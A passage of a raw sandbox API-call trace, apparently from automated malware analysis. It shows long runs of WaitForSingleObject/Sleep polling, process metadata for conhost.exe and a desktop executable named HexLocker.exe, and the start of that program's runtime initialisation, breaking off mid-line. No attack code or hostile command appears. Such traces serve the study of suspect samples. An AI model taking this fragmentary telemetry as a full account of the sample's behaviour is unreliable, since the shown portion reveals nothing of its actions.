dwMilliseconds=0x0) returned 0x102 [0288.569] Sleep (dwMilliseconds=0xa) [0288.611] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.611] Sleep (dwMilliseconds=0xa) [0288.649] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.649] Sleep (dwMilliseconds=0xa) [0288.685] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.685] Sleep (dwMilliseconds=0xa) [0288.809] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.809] Sleep (dwMilliseconds=0xa) [0288.880] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.880] Sleep (dwMilliseconds=0xa) [0288.951] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0288.952] Sleep (dwMilliseconds=0xa) [0289.024] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.024] Sleep (dwMilliseconds=0xa) [0289.094] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.094] Sleep (dwMilliseconds=0xa) [0289.181] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.181] Sleep (dwMilliseconds=0xa) [0289.246] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.246] Sleep (dwMilliseconds=0xa) [0289.303] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.303] Sleep (dwMilliseconds=0xa) [0289.339] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.339] Sleep (dwMilliseconds=0xa) [0289.377] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.377] Sleep (dwMilliseconds=0xa) [0289.529] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.529] Sleep (dwMilliseconds=0xa) [0289.598] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.598] Sleep (dwMilliseconds=0xa) [0289.634] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.634] Sleep (dwMilliseconds=0xa) [0289.677] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.677] Sleep (dwMilliseconds=0xa) [0289.714] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.714] Sleep (dwMilliseconds=0xa) [0289.753] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.753] Sleep (dwMilliseconds=0xa) [0289.791] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.791] Sleep (dwMilliseconds=0xa) [0289.944] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0289.944] Sleep (dwMilliseconds=0xa) [0290.012] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.013] Sleep (dwMilliseconds=0xa) [0290.083] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.083] Sleep (dwMilliseconds=0xa) [0290.165] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.165] Sleep (dwMilliseconds=0xa) [0290.237] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.237] Sleep (dwMilliseconds=0xa) [0290.319] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.320] Sleep (dwMilliseconds=0xa) [0290.373] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.374] Sleep (dwMilliseconds=0xa) [0290.568] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.568] Sleep (dwMilliseconds=0xa) [0290.617] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.617] Sleep (dwMilliseconds=0xa) [0290.657] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.657] Sleep (dwMilliseconds=0xa) [0290.707] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.707] Sleep (dwMilliseconds=0xa) [0290.749] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.750] Sleep (dwMilliseconds=0xa) [0290.793] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.793] Sleep (dwMilliseconds=0xa) [0290.837] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.837] Sleep (dwMilliseconds=0xa) [0290.875] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.876] Sleep (dwMilliseconds=0xa) [0290.934] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.934] Sleep (dwMilliseconds=0xa) [0290.996] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0290.996] Sleep (dwMilliseconds=0xa) [0291.124] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.124] Sleep (dwMilliseconds=0xa) [0291.207] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.207] Sleep (dwMilliseconds=0xa) [0291.277] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.277] Sleep (dwMilliseconds=0xa) [0291.348] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.348] Sleep (dwMilliseconds=0xa) [0291.533] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.533] Sleep (dwMilliseconds=0xa) [0291.616] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.616] Sleep (dwMilliseconds=0xa) [0291.693] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.693] Sleep (dwMilliseconds=0xa) [0291.730] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.730] Sleep (dwMilliseconds=0xa) [0291.765] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.766] Sleep (dwMilliseconds=0xa) [0291.804] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.804] Sleep (dwMilliseconds=0xa) [0291.838] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.838] Sleep (dwMilliseconds=0xa) [0291.885] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.885] Sleep (dwMilliseconds=0xa) [0291.922] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.922] Sleep (dwMilliseconds=0xa) [0291.962] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0291.962] Sleep (dwMilliseconds=0xa) [0292.018] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.018] Sleep (dwMilliseconds=0xa) [0292.078] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.078] Sleep (dwMilliseconds=0xa) [0292.153] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.153] Sleep (dwMilliseconds=0xa) [0292.288] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.288] Sleep (dwMilliseconds=0xa) [0292.359] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.359] Sleep (dwMilliseconds=0xa) [0292.558] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.558] Sleep (dwMilliseconds=0xa) [0292.631] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.631] Sleep (dwMilliseconds=0xa) [0292.706] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.706] Sleep (dwMilliseconds=0xa) [0292.824] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.824] Sleep (dwMilliseconds=0xa) [0292.872] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.872] Sleep (dwMilliseconds=0xa) [0292.908] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.908] Sleep (dwMilliseconds=0xa) [0292.981] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0292.981] Sleep (dwMilliseconds=0xa) [0293.066] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.066] Sleep (dwMilliseconds=0xa) [0293.122] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.122] Sleep (dwMilliseconds=0xa) [0293.200] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.200] Sleep (dwMilliseconds=0xa) [0293.245] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.246] Sleep (dwMilliseconds=0xa) [0293.389] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.389] Sleep (dwMilliseconds=0xa) [0293.563] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.563] Sleep (dwMilliseconds=0xa) [0293.643] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.643] Sleep (dwMilliseconds=0xa) [0293.723] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.723] Sleep (dwMilliseconds=0xa) [0293.774] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.774] Sleep (dwMilliseconds=0xa) [0293.843] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.843] Sleep (dwMilliseconds=0xa) [0293.906] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.906] Sleep (dwMilliseconds=0xa) [0293.941] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.941] Sleep (dwMilliseconds=0xa) [0293.978] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0293.978] Sleep (dwMilliseconds=0xa) [0294.013] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.013] Sleep (dwMilliseconds=0xa) [0294.064] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.065] Sleep (dwMilliseconds=0xa) [0294.113] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.113] Sleep (dwMilliseconds=0xa) [0294.177] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.177] Sleep (dwMilliseconds=0xa) [0294.219] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.219] Sleep (dwMilliseconds=0xa) [0294.265] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.265] Sleep (dwMilliseconds=0xa) [0294.300] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.300] Sleep (dwMilliseconds=0xa) [0294.334] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.334] Sleep (dwMilliseconds=0xa) [0294.598] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.598] Sleep (dwMilliseconds=0xa) [0294.721] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.721] Sleep (dwMilliseconds=0xa) [0294.789] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.789] Sleep (dwMilliseconds=0xa) [0294.861] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.861] Sleep (dwMilliseconds=0xa) [0294.948] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0294.948] Sleep (dwMilliseconds=0xa) [0295.038] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.038] Sleep (dwMilliseconds=0xa) [0295.111] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.112] Sleep (dwMilliseconds=0xa) [0295.179] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.179] Sleep (dwMilliseconds=0xa) [0295.244] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.244] Sleep (dwMilliseconds=0xa) [0295.280] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.280] Sleep (dwMilliseconds=0xa) [0295.315] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.315] Sleep (dwMilliseconds=0xa) [0295.433] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.433] Sleep (dwMilliseconds=0xa) [0295.470] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.470] Sleep (dwMilliseconds=0xa) [0295.505] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.505] Sleep (dwMilliseconds=0xa) [0295.542] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.542] Sleep (dwMilliseconds=0xa) [0295.604] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.604] Sleep (dwMilliseconds=0xa) [0295.641] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.641] Sleep (dwMilliseconds=0xa) [0295.679] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.679] Sleep (dwMilliseconds=0xa) [0295.714] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.714] Sleep (dwMilliseconds=0xa) [0295.838] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.838] Sleep (dwMilliseconds=0xa) [0295.909] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.909] Sleep (dwMilliseconds=0xa) [0295.978] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0295.979] Sleep (dwMilliseconds=0xa) [0296.051] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.051] Sleep (dwMilliseconds=0xa) [0296.151] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.151] Sleep (dwMilliseconds=0xa) [0296.274] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.274] Sleep (dwMilliseconds=0xa) [0296.327] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.327] Sleep (dwMilliseconds=0xa) [0296.367] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.368] Sleep (dwMilliseconds=0xa) [0296.469] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.470] Sleep (dwMilliseconds=0xa) [0296.506] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.506] Sleep (dwMilliseconds=0xa) [0296.543] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.543] Sleep (dwMilliseconds=0xa) [0296.587] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.587] Sleep (dwMilliseconds=0xa) [0296.631] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.631] Sleep (dwMilliseconds=0xa) [0296.668] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.668] Sleep (dwMilliseconds=0xa) [0296.732] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.732] Sleep (dwMilliseconds=0xa) [0296.808] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.809] Sleep (dwMilliseconds=0xa) [0296.939] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0296.939] Sleep (dwMilliseconds=0xa) [0297.015] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.016] Sleep (dwMilliseconds=0xa) [0297.098] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.098] Sleep (dwMilliseconds=0xa) [0297.206] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.206] Sleep (dwMilliseconds=0xa) [0297.329] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.329] Sleep (dwMilliseconds=0xa) [0297.449] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.449] Sleep (dwMilliseconds=0xa) [0297.500] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.500] Sleep (dwMilliseconds=0xa) [0297.578] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.578] Sleep (dwMilliseconds=0xa) [0297.629] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.629] Sleep (dwMilliseconds=0xa) [0297.667] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.667] Sleep (dwMilliseconds=0xa) [0297.702] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.702] Sleep (dwMilliseconds=0xa) [0297.742] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.742] Sleep (dwMilliseconds=0xa) [0297.790] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.790] Sleep (dwMilliseconds=0xa) [0297.838] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.838] Sleep (dwMilliseconds=0xa) [0297.876] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.876] Sleep (dwMilliseconds=0xa) [0297.911] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0297.911] Sleep (dwMilliseconds=0xa) [0298.036] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.036] Sleep (dwMilliseconds=0xa) [0298.108] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.108] Sleep (dwMilliseconds=0xa) [0298.189] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.190] Sleep (dwMilliseconds=0xa) [0298.281] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.281] Sleep (dwMilliseconds=0xa) [0298.349] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.350] Sleep (dwMilliseconds=0xa) [0298.517] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.517] Sleep (dwMilliseconds=0xa) [0298.585] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.586] Sleep (dwMilliseconds=0xa) [0298.627] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.627] Sleep (dwMilliseconds=0xa) [0298.668] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.668] Sleep (dwMilliseconds=0xa) [0298.734] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.734] Sleep (dwMilliseconds=0xa) [0298.778] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.778] Sleep (dwMilliseconds=0xa) [0298.828] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.828] Sleep (dwMilliseconds=0xa) [0298.862] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.862] Sleep (dwMilliseconds=0xa) [0298.897] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.897] Sleep (dwMilliseconds=0xa) [0298.936] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.936] Sleep (dwMilliseconds=0xa) [0298.972] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0298.972] Sleep (dwMilliseconds=0xa) [0299.006] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.007] Sleep (dwMilliseconds=0xa) [0299.043] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.043] Sleep (dwMilliseconds=0xa) [0299.182] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.182] Sleep (dwMilliseconds=0xa) [0299.252] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.252] Sleep (dwMilliseconds=0xa) [0299.321] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.324] Sleep (dwMilliseconds=0xa) [0299.523] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.523] Sleep (dwMilliseconds=0xa) [0299.596] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.597] Sleep (dwMilliseconds=0xa) [0299.670] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.670] Sleep (dwMilliseconds=0xa) [0299.731] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.732] Sleep (dwMilliseconds=0xa) [0299.766] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) returned 0x102 [0299.766] Sleep (dwMilliseconds=0xa) [0299.824] WaitForSingleObject (hHandle=0x234, dwMilliseconds=0x0) Thread: id = 49 os_tid = 0x388 Process: id = "12" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1ec97000" os_pid = "0xd38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xcf8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 40 os_tid = 0xd28 Thread: id = 41 os_tid = 0xd88 Thread: id = 42 os_tid = 0xddc Thread: id = 46 os_tid = 0xca4 Thread: id = 47 os_tid = 0xb00 Thread: id = 57 os_tid = 0x101c Thread: id = 58 os_tid = 0x1368 Process: id = "13" image_name = "hexlocker.exe" filename = "c:\\users\\fd1hvy\\desktop\\hexlocker.exe" page_root = "0x13f24000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x348" cmd_line = "HexLocker.exe " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0xe08 [0120.736] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8cff74 | out: lpSystemTimeAsFileTime=0x8cff74*(dwLowDateTime=0xee0588ad, dwHighDateTime=0x1d67c7d)) [0120.736] GetCurrentProcessId () returned 0xa94 [0120.736] GetCurrentThreadId () returned 0xe08 [0120.736] GetTickCount () returned 0x115f44f [0120.736] QueryPerformanceCounter (in: lpPerformanceCount=0x8cff6c | out: lpPerformanceCount=0x8cff6c*=21629237901) returned 1 [0120.991] GetStartupInfoW (in: lpStartupInfo=0x8cff18 | out: lpStartupInfo=0x8cff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5, hStdOutput=0x8cff7c, hStdError=0x41f641)) [0120.991] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x970000 [0120.993] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0120.994] GetProcAddress (hModule=0x772d0000, lpProcName="FlsAlloc") returned 0x772e4ae0 [0120.994] GetProcAddress (hModule=0x772d0000, lpProcName="FlsGetValue") returned 0x772e4b20 [0120.994] GetProcAddress (hModule=0x772d0000, lpProcName="FlsSetValue") returned 0x772e4b40 [0120.994] GetProcAddress (hModule=0x772d0000, lpProcName="FlsFree") returned 0x772e4b00 [0120.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x214) returned 0x9705a8 [0120.995] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0120.995] GetCurrentThreadId () returned 0xe08 [0120.995] GetStartupInfoW (in: lpStartupInfo=0x8cfeb4 | out: lpStartupInfo=0x8cfeb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4179d7, hStdOutput=0x417d7e, hStdError=0x9705a8)) [0120.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x800) returned 0x9707c8 [0120.996] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0120.996] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0120.996] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.996] SetHandleCount (uNumber=0x20) returned 0x20 [0120.996] GetCommandLineW () returned="HexLocker.exe " [0120.996] GetEnvironmentStringsW () returned 0xa76810* [0120.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf10) returned 0x970fd0 [0120.997] FreeEnvironmentStringsW (penv=0xa76810) returned 1 [0120.997] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x496f38, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\HexLocker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlocker.exe")) returned 0x25 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x971ee8 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0xc4) returned 0x971f18 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x3e) returned 0x971fe8 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x50) returned 0x972030 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x5c) returned 0x972088 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x5c) returned 0x9720f0 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x60) returned 0x972158 [0120.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x62) returned 0x9721c0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x62) returned 0x972230 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x62) returned 0x9722a0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x60) returned 0x972310 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x60) returned 0x972378 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x60) returned 0x9723e0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x24) returned 0x972448 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x4e) returned 0x972478 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x6e) returned 0x9724d0 [0120.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x8, Size=0x78) returned 0x972548 [0120.998] RtlAllocateHeap 